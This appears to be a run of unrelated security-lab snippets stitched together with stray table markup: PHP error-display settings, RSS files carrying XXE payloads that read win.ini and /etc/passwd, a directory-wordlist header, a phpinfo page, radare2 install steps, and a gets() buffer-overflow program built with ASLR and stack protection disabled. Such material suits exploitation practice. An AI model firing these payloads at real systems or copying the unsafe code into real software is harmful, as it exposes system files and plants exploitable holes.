In script:
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
In php.ini:
display_errors = on
001 | |
002 | |
003 | |
004 | |
005 | |
006 | |
007 | |
008 | |
009 | |
01 |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE title [ <!ELEMENT title ANY > | |
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>The Blog</title> | |
<link>http://example.com/</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE title [ <!ELEMENT title ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>The Blog</title> | |
<link>http://example.com/</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> |
# directory-list-2.3-small.txt | |
# | |
# Copyright 2007 James Fisher | |
# | |
# This work is licensed under the Creative Commons | |
# Attribution-Share Alike 3.0 License. To view a copy of this | |
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ | |
# or send a letter to Creative Commons, 171 Second Street, | |
# Suite 300, San Francisco, California, 94105, USA. | |
# |
<?php | |
phpinfo(); | |
?> |
wget https://github.com/radare/radare2/archive/1.3.0.tar.gz | |
tar xf 1.3.0.tar.gz | |
cd radare2-1.3.0 | |
sys/install.sh |
apt install execstack | |
gcc -m64 -fno-stack-protector -z execstack -o bof bof-gets.c | |
echo 0 > /proc/sys/kernel/randomize_va_space |
#include <stdio.h> | |
int main(int argc, char *argv[]) { | |
char buf[256]; | |
gets(buf); | |
printf("You entered: %s\n", buf); | |
} |